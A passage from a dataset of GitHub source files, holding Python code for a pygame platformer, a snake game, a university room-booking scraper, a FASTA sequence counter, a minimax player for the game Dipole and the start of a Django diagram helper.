turtle.dirs[\"right\"] if turtle.dir == turtle.dirs[\"left\"] else turtle.dirs[\"left\"]\r\n return\r\n # 64 50\r\n elif (spike.type == 'spike_down' or spike.type == 'spike_left' or spike.type == 'angry_spike_right' or \r\n spike.type == 'angry_spike_left' or spike.type == 'spike_right' or \r\n spike.type == 'angry_spike_down'):\r\n if spike.rect.y == turtle.rect.y - 14:\r\n if spike.rect.colliderect(turtle.rect):\r\n turtle.dir = turtle.dirs[\"right\"] if turtle.dir == turtle.dirs[\"left\"] else turtle.dirs[\"left\"]\r\n return\r\n # tile_size * factor 50\r\n elif (spike.type == 'angry_spike_up' and spike.state == spike.states[\"angry\"]):\r\n if spike.rect.y == turtle.rect.y - 78: #TODO: change to spike height\r\n if spike.rect.colliderect(turtle.rect):\r\n turtle.dir = turtle.dirs[\"right\"] if turtle.dir == turtle.dirs[\"left\"] else turtle.dirs[\"left\"]\r\n return\r\n\r\n def horizontal_movement_collision(self):\r\n self.player.sprite.rect.x += self.player.sprite.direction.x * self.player.sprite.speed\r\n\r\n for tile in self.tiles.sprites():\r\n if tile.rect.colliderect(self.player.sprite.rect) and not (\r\n tile.type == 'exit_tile' or tile.type == 'exit_trigger' or\r\n (tile.type == 'green_block' and tile.state_block == 'off') or\r\n (tile.type == 'red_block' and tile.state_block == 'off')\r\n ): # then flip\r\n if self.player.sprite.direction.x < 0: # moving left\r\n self.player.sprite.rect.left = tile.rect.right\r\n elif self.player.sprite.direction.x > 0: # moving right\r\n self.player.sprite.rect.right = tile.rect.left\r\n \r\n if self.doors and self.keys_collected == 0:\r\n for door in self.doors.sprites():\r\n if door.rect.colliderect(self.player.sprite.rect): # then flip\r\n if self.player.sprite.direction.x < 0: # moving left\r\n self.player.sprite.rect.left = door.rect.right\r\n elif self.player.sprite.direction.x > 0: # moving right\r\n self.player.sprite.rect.right = door.rect.left\r\n\r\n def vertical_movement_collision(self):\r\n self.player.sprite.apply_gravity(not self.levitate)\r\n if self.player.sprite.jumped:\r\n self.touches_trigger = False\r\n\r\n for tile in self.tiles.sprites():\r\n if tile.rect.colliderect(self.player.sprite.rect) and not (\r\n tile.type == 'exit_tile' or tile.type == 'exit_trigger' or\r\n (tile.type == 'green_block' and tile.state_block == 'off') or\r\n (tile.type == 'red_block' and tile.state_block == 'off')\r\n ): # then flip\r\n if self.player.sprite.direction.y > 0: # moving/falling down\r\n self.player.sprite.rect.bottom = tile.rect.top\r\n self.player.sprite.direction.y = 0 # glitch protection\r\n\r\n self.player.sprite.jumped = False # on the ground, allow for jumping\r\n elif self.player.sprite.direction.y < 0 or self.levitate: # moving up\r\n self.player.sprite.rect.top = tile.rect.bottom\r\n self.player.sprite.direction.y = 0 # hit a block from below = bounce down\r\n \r\n if (tile.type == 'green_trigger' or tile.type == 'red_trigger'):\r\n if not self.touches_trigger:\r\n col = 'green' if tile.type == 'green_trigger' else 'red'\r\n self.switch_sound.play()\r\n\r\n for tile_ in self.tiles.sprites():\r\n if tile_.type == f'{col}_block':\r\n tile_.switch(col)\r\n \r\n self.touches_trigger = True\r\n else:\r\n self.touches_trigger = False\r\n\r\n if self.doors and self.keys_collected == 0:\r\n for door in self.doors.sprites():\r\n if door.rect.colliderect(self.player.sprite.rect): # then flip\r\n if self.player.sprite.direction.y > 0: # moving/falling down\r\n self.player.sprite.rect.bottom = door.rect.top\r\n self.player.sprite.direction.y = 0 # glitch protection\r\n\r\n self.player.sprite.jumped = False # on the ground, allow for jumping\r\n elif self.player.sprite.direction.y < 0 or self.levitate: # moving up\r\n self.player.sprite.rect.top = door.rect.bottom\r\n self.player.sprite.direction.y = 0 # hit a block from below = bounce down\r\n\r\n # if fell down\r\n if self.player.sprite.direction.y > 0 and self.player.sprite.rect.bottom > HEIGHT:\r\n self.death()\r\n \r\n def death(self):\r\n self.death_sound.play()\r\n\r\n self.world_shift = 0\r\n self.temp_points = 0\r\n self.temp_keys = 0\r\n\r\n if self.curr_lvl in self.levels_with_exit_triggered:\r\n self.setup_level(self.lvl_data, 'triggered', True) # false if spawn without fall\r\n else:\r\n self.setup_level(self.lvl_data, 'not_triggered', True) # false if spawn without fall\r\n\r\n def show_text(self, pos, what_to_render):\r\n self.display_surface.blit(what_to_render, pos)\r\n \r\n def unlock_exit(self):\r\n unlocked1, unlocked2 = False, False\r\n for tile in self.tiles.sprites():\r\n if tile.type == 'exit_trigger':\r\n tile.image = pygame.image.load(os.path.join(ROOT_DIR, 'art', 'exit trigger2.png'))\r\n unlocked1 = True\r\n elif tile.type == 'exit_tile':\r\n tile.image = pygame.image.load(os.path.join(ROOT_DIR, 'art', 'exit2.png'))\r\n unlocked2 = True\r\n if unlocked1 and unlocked2:\r\n return \r\n\r\n def run_menu(self):\r\n self.game_state = 'menu'\r\n\r\n def run(self, keyup_, mousedown_):\r\n if self.levitate:\r\n if time.time() - self.timer >= 2:\r\n self.levitate = False\r\n else:\r\n self.player.sprite.jumped = True # disable jumping\r\n self.player.sprite.lift(2)\r\n\r\n self.scroll_x()\r\n\r\n # menu\r\n if self.game_state == 'menu':\r\n if keyup_:\r\n self.moved = False\r\n self.update_dot()\r\n\r\n self.menu.draw(self.display_surface)\r\n self.display_surface.blit(self.dot_image, (self.dot_rect.x, self.dot_rect.y))\r\n elif self.game_state == 'level_menu':\r\n self.level_tiles.update()\r\n self.level_tiles.draw(self.display_surface)\r\n\r\n for lvl_tile in self.level_tiles.sprites():\r\n if lvl_tile.click_check(mousedown_):\r\n self.temp_points = 0 # prevention\r\n self.temp_keys = 0\r\n \r\n self.curr_lvl = lvl_tile.level\r\n self.lvl_data = levels[self.curr_lvl]\r\n self.game_state = 'game'\r\n\r\n if lvl_tile.level in self.levels_with_exit_triggered:\r\n self.setup_level(self.lvl_data, 2, True)\r\n else:\r\n self.setup_level(self.lvl_data, 1, True)\r\n \r\n return\r\n elif self.game_state == 'game':\r\n # tiles\r\n self.tiles.update(self.world_shift)\r\n\r\n # mobs\r\n self.turtles.update(self.world_shift)\r\n self.turtle_bounce_collision()\r\n\r\n # spikes\r\n self.spikes.update(self.world_shift)\r\n\r\n # buttons\r\n self.floating_pads.update(self.world_shift)\r\n\r\n # doors and keys\r\n self.doors.update(self.world_shift)\r\n self.keys.update(self.world_shift)\r\n\r\n # coins\r\n self.coins.update(self.world_shift)\r\n\r\n # achievements\r\n self.achievement1.update(self.world_shift)\r\n\r\n # player\r\n self.player.update(self.mid_air_jumps_allowed)\r\n self.exit_trigger_collision()\r\n self.exit_collision()\r\n self.coin_collision()\r\n self.turtle_collision()\r\n self.key_collision()\r\n self.door_collision()\r\n self.spike_collision()\r\n self.floating_pad_collision()\r\n self.achievement_collision()\r\n self.horizontal_movement_collision()\r\n self.vertical_movement_collision()\r\n\r\n ###### drawing ######\r\n self.bckg.draw(self.display_surface)\r\n\r\n for tile in self.tiles.sprites():\r\n if tile.rect.x > -tile_size and tile.rect.x < WIDTH:\r\n self.display_surface.blit(tile.image, (tile.rect.x, tile.rect.y))\r\n\r\n for coin in self.coins.sprites():\r\n if coin.rect.x > -16 and coin.rect.x < WIDTH:\r\n self.display_surface.blit(coin.image, (coin.rect.x, coin.rect.y))\r\n\r\n for spike in self.spikes.sprites():\r\n if (((spike.type == 'spike_right' or spike.type == 'spike_left' \r\n or spike.type == 'angry_spike_left' or spike.type == 'angry_spike_right') and\r\n (spike.rect.x > -spike.width and spike.rect.x < WIDTH)) or ((spike.type == 'spike_up' or spike.type == 'spike_down' \r\n or spike.type == 'angry_spike_down' or spike.type == 'angry_spike_up') and\r\n (spike.rect.x > -tile_size and spike.rect.x < WIDTH))):\r\n self.display_surface.blit(spike.image, (spike.rect.x, spike.rect.y))\r\n\r\n for turtle in self.turtles.sprites():\r\n if turtle.rect.x > -tile_size and turtle.rect.x < WIDTH:\r\n self.display_surface.blit(turtle.image, (turtle.rect.x, turtle.rect.y))\r\n \r\n for floating_pad in self.floating_pads.sprites():\r\n if floating_pad.rect.x > -tile_size and floating_pad.rect.x < WIDTH:\r\n self.display_surface.blit(floating_pad.image, (floating_pad.rect.x, floating_pad.rect.y))\r\n\r\n for door in self.doors.sprites():\r\n if door.rect.x > -tile_size and door.rect.x < WIDTH:\r\n self.display_surface.blit(door.image, (door.rect.x, door.rect.y))\r\n\r\n for key in self.keys.sprites():\r\n if key.rect.x > -16 and key.rect.x < WIDTH:\r\n self.display_surface.blit(key.image, (key.rect.x, key.rect.y)) \r\n\r\n self.achievement1.draw(self.display_surface)\r\n\r\n self.player.draw(self.display_surface)\r\n\r\n if self.keys_collected > 0:\r\n self.blit_keys(self.keys_collected)\r\n\r\n # text\r\n level_txt = self.font.render(\"Poziom: \" + str(self.curr_lvl + 1), True, 'green')\r\n self.show_text((0, 0), level_txt)\r\n\r\n score = self.font.render(\"Punkty: \" + str(self.data[\"coins\"] + self.temp_points), True, 'white')\r\n self.show_text((0, level_txt.get_rect().bottom + 5), score)\r\n\r\n cop = self.cop_font.render(\"by Oliwier Moskalewicz 2022\", True, 'white')\r\n self.show_text((5, HEIGHT - 15), cop)\r\n \r\n def blit_keys(self, number):\r\n key_image = pygame.image.load(os.path.join(ROOT_DIR, 'art', 'key.png'))\r\n\r\n x = WIDTH - 37\r\n y = 5\r\n for i in range(number):\r\n self.display_surface.blit(key_image, (x, y))\r\n x -= 37\r\n\r\n def clear_data(self):\r\n with open(os.path.join(ROOT_DIR, 'others', 'data.txt'), 'w') as file:\r\n self.data = {\r\n 'levels_completed': 0,\r\n 'coins': 0\r\n }\r\n json.dump(self.data, file)","repo_name":"yabuszko/Projects","sub_path":"platformer/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":26561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"73024827592","text":"### TODO:\r\n### During the request for facility availability, the endDataTime and startDataTime parameters should be changed.\r\n### Try successful booking\r\n\r\nimport requests\r\nimport json\r\nfrom robobrowser import RoboBrowser\r\nfrom datetime import datetime, time\r\nfrom pprint import pprint\r\n\r\n\r\nclass Booker():\r\n LOGIN_URL = \"https://ntupcb.ntu.edu.sg/fbscbs/Account/SignIn?ReturnUrl=%2ffbscbs\"\r\n FACILITY_AVALIABILITY_URL = \"https://ntupcb.ntu.edu.sg/fbscbs/Booking/CalendarData\"\r\n FACILITY_BOOKING_URL = \"https://ntupcb.ntu.edu.sg/fbscbs/Booking/Create?resourceId=\"\r\n\r\n def __init__(self, username, password):\r\n self.username = username\r\n self.password = password\r\n self.browser = RoboBrowser(parser=\"lxml\")\r\n self.browser.open(Booker.LOGIN_URL)\r\n\r\n def login(self):\r\n login_form = self.browser.get_form()\r\n login_form[\"Username\"] = self.username\r\n login_form[\"Password\"] = self.password\r\n self.browser.submit_form(login_form)\r\n if b'Incorrect domain, user name or password' in self.browser.response.content:\r\n return {\"success\": \"False\"}\r\n else:\r\n return {\"success\": \"True\"}\r\n\r\n def get_facil_avaliability(self, resource_id):\r\n r = self.browser.session.post(\r\n Booker.FACILITY_AVALIABILITY_URL,\r\n data={\r\n \"endDateTime\": \"2019-02-03T16:00:00.000Z\",\r\n \"isOnBehalf\": False,\r\n \"resourceId\": resource_id,\r\n \"startDateTime\": \"2019-01-27T16:00:00.000Z\",\r\n },\r\n headers={\r\n \"Access-Control-Allow-Origin\":\r\n \"http://webdavserver.com\",\r\n \"Access-Control-Allow-Credentials\":\r\n \"true\",\r\n \"Access-Control-Allow-Methods\":\r\n \"ACL, CANCELUPLOAD, CHECKIN, CHECKOUT, COPY, DELETE, GET, HEAD, LOCK, MKCALENDAR, MKCOL, MOVE, OPTIONS, POST, PROPFIND, PROPPATCH, PUT, REPORT, SEARCH, UNCHECKOUT, UNLOCK, UPDATE, VERSION-CONTROL\",\r\n \"Access-Control-Allow-Headers\":\r\n \"Overwrite, Destination, Content-Type, Depth, User-Agent, Translate, Range, Content-Range, Timeout, X-File-Size, X-Requested-With, If-Modified-Since, X-File-Name, Cache-Control, Location, Lock-Token, If\",\r\n \"Access-Control-Expose-Headers\":\r\n \"DAV, content-length, Allow\",\r\n \"X-Requested-With\":\r\n \"XMLHttpRequest\",\r\n \"Referer\":\r\n \"https://ntupcb.ntu.edu.sg/fbscbs/Booking/Create?resourceId=\" +\r\n str(resource_id)\r\n })\r\n self.browser._update_state(r)\r\n parsed_dict = self.format_avaliability_json(json.loads(r.content))\r\n return parsed_dict\r\n\r\n def format_avaliability_json(self, d):\r\n for booking in d['Bookings']:\r\n start_ts = int(booking['StartDateTime'][6:-5])\r\n end_ts = int(booking['EndDateTime'][6:-5])\r\n s = datetime.utcfromtimestamp(start_ts)\r\n e = datetime.utcfromtimestamp(end_ts)\r\n booking['TimeCoordinate'] = {\r\n \"Weekday\": s.weekday() + 1,\r\n \"StartTimeCoordinate\": s.hour,\r\n \"EndTimeCoordinate\" : e.hour\r\n }\r\n return d\r\n\r\n def book_facility(self,\r\n resource_id,\r\n start_time,\r\n end_time,\r\n date=datetime.today().strftime('%d/%m/%Y'),\r\n number_of_people=1,\r\n course_code=str(),\r\n purpose_of_use=str()):\r\n '''\r\n Date format: dd/mm/yyyy\r\n Time format: hh:mm:ss\r\n '''\r\n r = self.browser.session.get(Booker.FACILITY_BOOKING_URL +\r\n str(resource_id))\r\n self.browser._update_state(r)\r\n try:\r\n booking_form = self.browser.get_form()\r\n booking_form['StartDateTime.Date'] = date\r\n booking_form['EndDateTime.Date'] = date\r\n booking_form['StartDateTime.TimeOfDay'] = start_time\r\n booking_form['EndDateTime.TimeOfDay'] = end_time\r\n booking_form['NoOfPeopleExpected'] = number_of_people\r\n booking_form['CourseCode'] = course_code\r\n booking_form['PurposeOfUse'] = purpose_of_use\r\n except ValueError:\r\n return json.loads('{\"success\": \"False\"}')\r\n else:\r\n self.browser.submit_form(booking_form)\r\n return json.loads(self.browser.response.content)","repo_name":"l0rem1psum/NTU-Facility-Booking-API","sub_path":"booker/booking.py","file_name":"booking.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"72481661191","text":"import pygame\nimport random\nimport math\nimport time\n\n\npygame.init()\nscreen = pygame.display.set_mode((500, 500))\nscreen_width, screen_height = screen.get_size()\n\nfont = pygame.font.SysFont(\"Courier New\", 20)\n\n#Setting up Sounds\nfood_sound = pygame.mixer.Sound('sound/eat.mp3')\ngame_over_theme_sound = pygame.mixer.Sound('sound/game_over_theme.mp3')\npygame.mixer.music.load('sound/super_mario.mp3')\npygame.mixer.music.play(-1)\n\nrunning = True\nstate = 'main menu'\n\n#Detecting collision between circle and rectangle\ndef collision(rleft, rtop, width, height,\n center_x, center_y, radius):\n rright, rbottom = rleft + width/2, rtop + height/2\n cleft, ctop = center_x-radius, center_y-radius\n cright, cbottom = center_x+radius, center_y+radius\n if rright < cleft or rleft > cright or rbottom < ctop or rtop > cbottom:\n return False\n for x in (rleft, rleft+width):\n for y in (rtop, rtop+height):\n if math.hypot(x-center_x, y-center_y) <= radius:\n return True\n if rleft <= center_x <= rright and rtop <= center_y <= rbottom:\n return True\n return False\n\n#When losing\ndef game_over() :\n game_over_theme_sound.play()\n snake.speed = 0\n time.sleep(2)\n global state\n state = 'game over'\n\nclass Snake:\n def __init__(self, x, y):\n self.size = 0\n self.elements = [[x, y]]\n self.radius = 10\n self.dx = 5\n self.dy = 0\n self.is_add = False\n self.speed = 1\n self.level = 1\n\n def draw(self):\n #Dynamically changing color\n for i in range(self.size + 1):\n if 255 - i - 20 >= 0 :\n pygame.draw.circle(screen, (255 - i - 20, 0, 0), self.elements[i], self.radius)\n else :\n pygame.draw.circle(screen, (0, 0, 0), self.elements[i], self.radius)\n\n def add_to_snake(self):\n self.size += 1\n self.elements.append([0, 0])\n self.is_add = False\n if self.size % 4 == 0 :\n self.speed += 0.1\n self.level += 1\n\n def move(self):\n if self.is_add:\n self.add_to_snake()\n\n for i in range(self.size, 0, -1):\n self.elements[i][0] = self.elements[i - 1][0]\n self.elements[i][1] = self.elements[i - 1][1]\n\n for i in range(self.size - 1, 1, -1) :\n if self.elements[0] == self.elements[i] :\n game_over()\n\n self.elements[0][0] += self.speed * self.dx\n self.elements[0][1] += self.speed * self.dy\n\n def eat(self, foodx, foody):\n x = self.elements[0][0]\n y = self.elements[0][1]\n if foodx - 10 <= x <= foodx + 40 and foody - 10 <= y <= foody + 40:\n return True\n return False\n\n def food(self, foodx, foody) :\n for i in range(self.size) :\n x = self.elements[i][0]\n y = self.elements[i][1]\n if collision(foodx, foody, 20, 20, x, y, self.radius) :\n return True\n\n def wall(self, wallx, wally, wallw, wallh) :\n x = self.elements[0][0]\n y = self.elements[0][1]\n if wallx <= x <= wallx + wallw and wally <= y <= wally + wallh:\n return True\n return False\n\nclass Food:\n def __init__(self):\n self.x = random.randint(0, screen_width - 20)\n self.y = random.randint(0, screen_height - 20)\n\n def gen(self):\n self.x = random.randint(0, screen_width - 20)\n self.y = random.randint(0, screen_height - 20)\n\n def draw(self):\n pygame.draw.rect(screen, (34, 173, 48), (self.x, self.y, 20, 20))\n\n\nclass Wall(pygame.sprite.Sprite) :\n def __init__(self, index):\n super().__init__()\n self.index = index\n self.dimensions = (20, random.randint(100, 200))\n self.choose = random.randint(0, 1)\n self.width = self.dimensions[self.choose]\n self.height = self.dimensions[0] if self.choose == 1 else self.dimensions[1]\n #Making walls appear on different parts of screen\n if self.index == 1 :\n self.x = random.randint(0, screen_width / 2 - self.width)\n self.y = random.randint(0, screen_height / 2 - self.height)\n elif self.index == 2 :\n self.x = random.randint(screen_width / 2, screen_width - self.width)\n self.y = random.randint(0, screen_height / 2 - self.height)\n elif self.index == 3 :\n self.x = random.randint(0, screen_width / 2 - self.width)\n self.y = random.randint(screen_height / 2, screen_height - self.height)\n elif self.index == 4 :\n self.x = random.randint(screen_width / 2, screen_width - self.width)\n self.y = random.randint(screen_height / 2, screen_height - self.height)\n self.rect = pygame.Rect(self.x, self.y, self.width, self.height)\n \n def gen(self) :\n self.width = self.dimensions[self.choose]\n self.height = self.dimensions[0] if self.choose == 1 else self.dimensions[1]\n if self.index == 1 :\n self.x = random.randint(0, screen_width / 2 - self.width)\n self.y = random.randint(0, screen_height / 2 - self.height)\n elif self.index == 2 :\n self.x = random.randint(screen_width / 2, screen_width - self.width)\n self.y = random.randint(0, screen_height / 2 - self.height)\n elif self.index == 3 :\n self.x = random.randint(0, screen_width / 2 - self.width)\n self.y = random.randint(screen_height / 2, screen_height - self.height)\n elif self.index == 4 :\n self.x = random.randint(screen_width / 2, screen_width - self.width)\n self.y = random.randint(screen_height / 2, screen_height - self.height)\n self.rect = pygame.Rect(self.x, self.y, self.width, self.height)\n\n def draw(self) :\n pygame.draw.rect(screen, (98, 50, 50), self.rect)\n\nclass Button() :\n def __init__(self, image, x, y):\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.topleft = (x, y)\n \n def draw(self) :\n screen.blit(self.image, self.rect.topleft)\n pos = pygame.mouse.get_pos()\n if self.rect.collidepoint(pos) :\n return True\n\nall_sprites = pygame.sprite.Group()\n\nsnake = Snake(0, 0)\nfood = Food()\nwall = Wall(1)\nwall1 = Wall(2)\nwall2 = Wall(3)\nwall3 = Wall(4)\n\nall_sprites.add(wall)\n\n#Checking if walls appear on top of each-other\nif wall.rect.colliderect(wall1.rect) :\n wall1.gen()\nelse :\n all_sprites.add(wall1)\n\nif wall1.rect.colliderect(wall2.rect) :\n wall2.gen()\nelse : \n all_sprites.add(wall2)\n\nif wall2.rect.colliderect(wall3.rect) :\n wall3.gen()\nelse : \n all_sprites.add(wall3)\n\nFPS = 60\nd = 5\n\n#Loading images for buttons\nmain_menu_bg_load = pygame.image.load('images/main_menu_snake.jpg')\nmain_menu_bg = Button(main_menu_bg_load, 0, 0)\nmain_menu_play_load = pygame.image.load('images/play_button_snake.png')\nmain_menu_play = Button(main_menu_play_load, (screen_width - main_menu_play_load.get_width()) / 2, 300)\nmain_menu_quit_load = pygame.image.load('images/quit_button_snake.png')\nmain_menu_quit = Button(main_menu_quit_load, (screen_width - main_menu_quit_load.get_width()) / 2, 400)\nmain_menu_restart_load = pygame.image.load('images/restart_button_snake.png')\nmain_menu_restart = Button(main_menu_restart_load, (screen_width - main_menu_restart_load.get_width()) / 2, 300)\n\nclock = pygame.time.Clock()\n\nwhile running:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n running = False\n if event.key == pygame.K_RIGHT and snake.dx != -d:\n snake.dx = d\n snake.dy = 0\n if event.key == pygame.K_LEFT and snake.dx != d:\n snake.dx = -d\n snake.dy = 0\n if event.key == pygame.K_UP and snake.dy != d:\n snake.dx = 0\n snake.dy = -d\n if event.key == pygame.K_DOWN and snake.dy != -d:\n snake.dx = 0\n snake.dy = d\n\n if event.type == pygame.MOUSEBUTTONDOWN and main_menu_play.draw() :\n state = 'play'\n if event.type == pygame.MOUSEBUTTONDOWN and main_menu_quit.draw() :\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN and main_menu_restart.draw() :\n #Reseting all the progress\n screen.fill((0, 0, 0))\n state = 'play'\n snake.size = 0\n snake.speed = 1\n snake.level = 1\n snake.elements.clear()\n snake.elements.append([0, 0])\n snake.dx = d\n snake.dy = 0\n for object in all_sprites :\n object.gen()\n\n if state == 'main menu' :\n main_menu_bg.draw()\n main_menu_play.draw()\n main_menu_quit.draw()\n elif state == 'play' :\n screen.fill((255, 255, 255))\n if snake.elements[0][0] > screen_width :\n snake.elements[0][0] = 0\n if snake.elements[0][0] < 0 :\n snake.elements[0][0] = screen_width\n if snake.elements[0][1] > screen_height :\n snake.elements[0][1] = 0\n if snake.elements[0][1] < 0 :\n snake.elements[0][1] = screen_height\n\n if snake.eat(food.x, food.y):\n food_sound.play()\n snake.is_add = True\n food.gen()\n\n if snake.food(food.x, food.y) :\n food.gen()\n\n for object in all_sprites :\n if snake.wall(object.x, object.y, object.width, object.height) :\n game_over()\n\n if object.rect.colliderect((food.x, food.y, 20, 20)):\n food.gen()\n\n food.draw()\n snake.draw()\n snake.move()\n wall.draw()\n wall1.draw()\n wall2.draw()\n wall3.draw()\n #Score and level text\n score = font.render(str(snake.size), True, (0, 0, 0))\n lvl = font.render(f\"lvl: {str(snake.level)}\", True, (0, 0, 0))\n screen.blit(score, (screen_width - score.get_width() - 10, 10))\n screen.blit(lvl, (screen_width - lvl.get_width() - 10, 30))\n\n elif state == 'game over' :\n main_menu_bg.draw()\n main_menu_restart.draw()\n main_menu_quit.draw()\n\n pygame.display.flip()\n\npygame.quit()","repo_name":"Asylniet/Pyhton3-university","sub_path":"lab8/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":10375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"29749337308","text":"import argparse\nfrom collections import defaultdict\nimport gzip\n\n\ndef fasta_load(fasta_in,string_match,string_count):\n first = True\n for line in fasta_in:\n line = line.strip()\n if line.startswith(';'):\n continue\n elif line.startswith('>') and not first:\n genomes[sequence_name] +=1\n sequence_name = line.split('>')[1].split('|')[0]\n if string_match:\n if string_match in line:\n string_count[sequence_name] += 1\n elif line.startswith('>'):\n sequence_name = line.split('>')[1].split('|')[0]\n if string_match:\n if string_match in line:\n string_count[sequence_name] += 1\n else:\n first = False\n genomes[sequence_name] +=1\n string_count[sequence_name] += 1\n return string_count\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--fasta_seq', action='store', dest='fasta_seq', required=True,\n help='FASTA file')\n parser.add_argument('-s', '--string_match', action='store', dest='string_match', required=False,\n default='', help='Optional: Count number of sequences with \"string\" in ID')\n parser.add_argument('-o', '--output_file', action='store', dest='out_file', required=True,\n help='Output file')\n\n options = parser.parse_args()\n string_count = defaultdict(int)\n genomes = defaultdict(int)\n try: # Detect whether fasta files are .gz or text and read accordingly\n fasta_in = gzip.open(options.fasta_seq,'rt')\n string_count = fasta_load(fasta_in,options.string_match,string_count)\n except:\n fasta_in = open(options.fasta_seq,'r')\n string_count = fasta_load(fasta_in,options.string_match,string_count)\n\n out = open(options.out_file, 'w', newline='\\n', encoding='utf-8')\n out.write(\"Genome_ID\\tNumber_Of_Seqs\\t\"+options.string_match+'\\n')\n for genome_id, sequence_count in sorted(genomes.items(), key=lambda item: item[1], reverse=True):\n if string_count[genome_id] > 0:\n out.write(genome_id+'\\t'+str(sequence_count)+'\\t'+str(string_count[genome_id])+'\\n')\n else:\n out.write(genome_id + '\\t' + str(sequence_count) +'\\n')\n\n\n\n\n\n\n\n\n","repo_name":"NickJD/Bioinformatic-Tools","sub_path":"FASTA/Seq_By_Genome_Counter.py","file_name":"Seq_By_Genome_Counter.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"18735161979","text":"import math\nimport random\n\nfrom games.dipole.player import DipolePlayer\nfrom games.dipole.result import DipoleResult\nfrom games.dipole.state import DipoleState\nfrom games.state import State\nfrom games.dipole.action import DipoleAction\n\n\nclass MinimaxDipolePlayer(DipolePlayer):\n def __init__(self, name):\n self.action_count = 0\n super().__init__(name)\n\n '''\n This heuristic will simply count the maximum number of consecutive pieces that the player has\n '''\n\n def __heuristic(self, state: DipoleState):\n player_score = state._count_captured_pieces(self.get_current_pos())\n opponent_score = state._count_captured_pieces(1 - self.get_current_pos())\n\n player_territory = 0\n opponent_territory = 0\n\n player_captured_pieces = 0\n opponent_captured_pieces = 0\n\n for i in range(state.get_num_rows()):\n for j in range(state.get_num_cols()):\n cell = state.get_grid()[i][j]\n opponent_pos = state.get_positions(i, j)\n\n if cell == -1: # if the cell is empty\n if all(state.get_grid()[n[0]][n[1]] == self.get_current_pos() for n in opponent_pos):\n player_territory += 1\n elif all(state.get_grid()[n[0]][n[1]] == 1 - self.get_current_pos() for n in opponent_pos):\n opponent_territory += 1\n elif cell == self.get_current_pos(): # if the cell is owned by the player\n if any(state.get_grid()[n[0]][n[1]] == 1 - self.get_current_pos() for n in opponent_pos):\n player_captured_pieces += 1\n elif cell == 1 - self.get_current_pos(): # if the cell is owned by the opponent\n if any(state.get_grid()[n[0]][n[1]] == self.get_current_pos() for n in opponent_pos):\n opponent_captured_pieces += 1\n\n return (player_score + player_territory + player_captured_pieces) - (opponent_score + opponent_territory + opponent_captured_pieces)\n\n \"\"\"Implementation of minimax search (recursive, with alpha/beta pruning) :param state: the state for which the \n search should be made :param depth: maximum depth of the search :param alpha: to optimize the search :param beta: \n to optimize the search :param is_initial_node: if true, the function will return the action with max ev, \n otherwise it return the max ev (ev = expected value) \"\"\"\n\n def minimax(self, state: DipoleState, depth: int, alpha: int = -math.inf, beta: int = math.inf,\n is_initial_node: bool = True):\n # first we check if we are in a terminal node (victory, draw or loose)\n if state.is_finished():\n return {\n DipoleResult.WIN: 40,\n DipoleResult.LOOSE: -40,\n DipoleResult.DRAW: 0\n }[state.get_result(self.get_current_pos())]\n\n # if we reached the maximum depth, we will return the value of the heuristic\n if depth == 0:\n return self.__heuristic(state)\n\n # if we are the acting player\n if self.get_current_pos() == state.get_acting_player():\n # very small integer\n value = -math.inf\n selected_action = None\n\n for action in state.get_possible_actions():\n new_state = state.clone()\n new_state.update(action)\n pre_value = value\n value = max(value, self.minimax(new_state, depth - 1, alpha, beta, False))\n if value > pre_value:\n selected_action = action\n if value > beta:\n break\n alpha = max(alpha, value)\n\n return selected_action if is_initial_node else value\n\n # if it is the opponent's turn\n else:\n value = math.inf\n for action in state.get_possible_actions():\n new_state = state.clone()\n new_state.update(action)\n value = min(value, self.minimax(new_state, depth - 1, alpha, beta, False))\n if value < alpha:\n break\n beta = min(beta, value)\n return value\n\n def get_action(self, state: DipoleState):\n self.action_count += 1\n\n if self.action_count > 15:\n return DipoleAction(is_pass=True)\n \n # Introduce some randomness in the initial moves\n if self.action_count < 3:\n possible_actions = state.get_possible_actions()\n return random.choice(possible_actions)\n return self.minimax(state, 2)\n\n def event_new_game(self):\n super().event_new_game()\n self.action_count = 0\n\n def event_action(self, pos: int, action, new_state: State):\n pass\n\n def event_end_game(self, final_state: State):\n pass\n","repo_name":"basiliobarbosaESTG/dipole-Game-IA","sub_path":"src/games/dipole/players/minimax.py","file_name":"minimax.py","file_ext":"py","file_size_in_byte":4854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"19977102701","text":"from django.db import models\nimport numpy as np\nimport re\n\n### utilities ###\n\nclass IconObj(object):\n \"\"\"Informations to draw an icon linking to another subject\n (on a causality diagram)\"\"\"\n def __init__(self,title,text,pic,color,pos,size,target_id,node_id=None):\n self.title = title\n self.text = text\n self.picture = pic\n self.color = color\n self.pos = pos\n self.size = size\n self.target_id = target_id\n self.node_id = node_id\n \n def norm(self,offset,factor):\n self.pos = [factor*(self.pos[i]+offset[i]) for i in range(2)]\n self.pos = [int(i) for i in self.pos]\n self.size = int(factor*self.size)\n \nclass ArrowObj(object):\n \"\"\"To draw arrows on a causality diagram\"\"\"\n def __init__(self,pos,color):\n self.pos = pos\n self.color = color\n \n def norm(self,offset,factor):\n pos=[factor*(offset[i[0]%2]+i[1]) for i in enumerate(self.pos)]\n self.pos = [int(i) for i in pos]\n \nclass DiagramObj(object):\n \"\"\"All information needed to draw a causality diagram\"\"\"\n def __init__(self,name,icons,pairs,margin,width,height,line_width,\n text_size_factor=3/2):\n \n text_size=text_size_factor*max([i.size for i in icons])\n \n offsetX = - min([i.pos[0]-text_size for i in icons])\n offsetY = - min([i.pos[1]-text_size for i in icons])\n offset = 